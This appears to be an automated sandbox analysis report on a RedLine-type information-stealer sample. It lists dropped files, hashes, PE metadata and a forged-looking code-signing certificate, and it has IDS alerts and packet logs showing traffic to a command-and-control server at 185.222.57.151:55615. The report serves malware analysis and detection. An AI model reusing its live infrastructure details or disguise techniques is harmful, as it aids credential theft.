                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):98304
                    Entropy (8bit):0.08235737944063153
                    Encrypted:false
                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):51200
                    Entropy (8bit):0.8746135976761988
                    Encrypted:false
                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):563720
                    Entropy (8bit):7.918041515283847
                    Encrypted:false
                    SSDEEP:12288:1Y5Q6QFm4SY+aZrwrLVRqRNlom98NGykPI7MqXb39bNjgJaXukR:u4/4rLVRqhoKIGNIgqxRiO1
                    MD5:304EA6D5CF3786D19DE14F004D7D057A
                    SHA1:D86DDB3BECC0A82C915BE35E7A7DCD796B50C269
                    SHA-256:89DD158D0FFDB6D661672343D36F5A87907E1CC60A0E9E85C892F75228EB399B
                    SHA-512:4C0731A52E57E429D1001DA518066C073CEB0C9C91992E66DC674C3DFC352156E48DC22DC5482310D2C0CE38A2E87AACE2DCFA7A9E6915D1BDE3EEE7BC8D3C08
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 83%
                    • Antivirus: Virustotal, Detection: 43%, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...LT.f..............0..D...........b... ........@.. ....................................@.................................@b..O....................d...6........................................................... ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............b..............@..B................tb......H.......@z...P......?...(...............................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0...........s.....s.....s..........(....s......s....}.....s....}.....{....o .....{....o .....(!.....{.....o".....{.....o#.....{.....o$.....{.....o%.....{......s&...o'.....{........s(...o).....{....r...po*.....{.... .... I...s+...o,.....{.....o-.....r...po......{....o/....o0.....r1..po......{....o1....o2.....{..... ..s&...o'..
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.918041515283847
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.97%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:RgIbrhxoEx.exe
                    File size:563'720 bytes
                    MD5:304ea6d5cf3786d19de14f004d7d057a
                    SHA1:d86ddb3becc0a82c915be35e7a7dcd796b50c269
                    SHA256:89dd158d0ffdb6d661672343d36f5a87907e1cc60a0e9e85c892f75228eb399b
                    SHA512:4c0731a52e57e429d1001da518066c073ceb0c9c91992e66dc674c3dfc352156e48dc22dc5482310d2c0ce38a2e87aace2dcfa7a9e6915d1bde3eee7bc8d3c08
                    SSDEEP:12288:1Y5Q6QFm4SY+aZrwrLVRqRNlom98NGykPI7MqXb39bNjgJaXukR:u4/4rLVRqhoKIGNIgqxRiO1
                    TLSH:4CC4238247B89F06CC766FF565618451CFB3BA3E9612C78E0ED250CD2AD2B806312E5F
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...LT.f..............0..D...........b... ........@.. ....................................@................................
                    Icon Hash:3570b480858580c5
                    Entrypoint:0x486292
                    Entrypoint Section:.text
                    Digitally signed:true
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A0544C [Wed Jul 24 01:09:32 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Signature Valid:false
                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                    Signature Validation Error:The digital signature of the object did not verify
                    Error Number:-2146869232
                    Not Before, Not After
                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
                    Subject Chain
                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                    Version:3
                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                    Serial:7C1118CBBADC95DA3752C46E47A27438
                    Instruction
                    jmp dword ptr [00402000h]
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x86240 | 0x4f | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x88000 | 0x1a90 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x86400 | 0x3608 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8a000 | 0xc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0x84298 | 0x84400 | 47a9d733aaf1a286ef3613a2d7639729 | False | 0.9371547879253308 | data | 7.9275615283647385 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rsrc | 0x88000 | 0x1a90 | 0x1c00 | 9d287d3493c1f36b4b63739a7b10d877 | False | 0.7892020089285714 | data | 7.256872537280392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x8a000 | 0xc | 0x200 | 9f9ad7bd097fddfbb7d07f5e7b6c4eaf | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    RT_ICON | 0x88118 | 0x162c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.906800563777308
                    RT_GROUP_ICON | 0x89744 | 0x14 | data | | | 0.9
                    RT_GROUP_ICON | 0x89758 | 0x14 | data | | | 1.05
                    RT_VERSION | 0x8976c | 0x324 | data | | | 0.43905472636815923
                    DLL | Import
                    mscoree.dll | _CorExeMain
                    Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                    2024-07-27T04:12:23.889248+0200 | TCP | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 55615 | 49709 | 185.222.57.151 | 192.168.2.5
                    2024-07-27T04:12:59.540993+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49719 | 40.127.169.103 | 192.168.2.5
                    2024-07-27T04:12:18.578362+0200 | TCP | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 49708 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:18.878917+0200 | TCP | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 49709 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:27.258175+0200 | TCP | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 55615 | 49709 | 185.222.57.151 | 192.168.2.5
                    2024-07-27T04:12:20.154106+0200 | TCP | 2848200 | ETPRO MALWARE RedLine - GetUpdates Request | 49711 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:18.200600+0200 | TCP | 2045001 | ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound | 55615 | 49706 | 185.222.57.151 | 192.168.2.5
                    2024-07-27T04:12:27.715047+0200 | TCP | 2849352 | ETPRO MALWARE RedLine - SetEnvironment Request | 49718 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:14.694601+0200 | TCP | 2045000 | ET MALWARE RedLine Stealer - CheckConnect Response | 55615 | 49706 | 185.222.57.151 | 192.168.2.5
                    2024-07-27T04:12:09.597710+0200 | TCP | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 49706 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:24.113320+0200 | TCP | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 49709 | 55615 | 192.168.2.5 | 185.222.57.151
                    2024-07-27T04:12:21.374284+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49710 | 40.127.169.103 | 192.168.2.5
                    2024-07-27T04:12:14.910173+0200 | TCP | 2849351 | ETPRO MALWARE RedLine - EnvironmentSettings Request | 49706 | 55615 | 192.168.2.5 | 185.222.57.151
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 04:12:18.657435894 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657447100 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657459021 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657470942 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657481909 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657494068 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657502890 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657505989 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657557011 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657612085 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657743931 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657756090 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657767057 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657778025 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657788992 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657799006 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657800913 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657809973 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657820940 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657845974 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657941103 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657953024 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657964945 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657969952 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.657975912 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657987118 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.657999039 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658005953 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658009052 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658014059 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658020973 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658032894 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658041954 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658044100 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658075094 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658083916 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658124924 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658128023 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658139944 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658150911 CEST5561549708185.222.57.151192.168.2.5
                    Jul 27, 2024 04:12:18.658163071 CEST4970855615192.168.2.5185.222.57.151
                    Jul 27, 2024 04:12:18.658183098 CEST5561549708185.222.57.151192.168.2.5
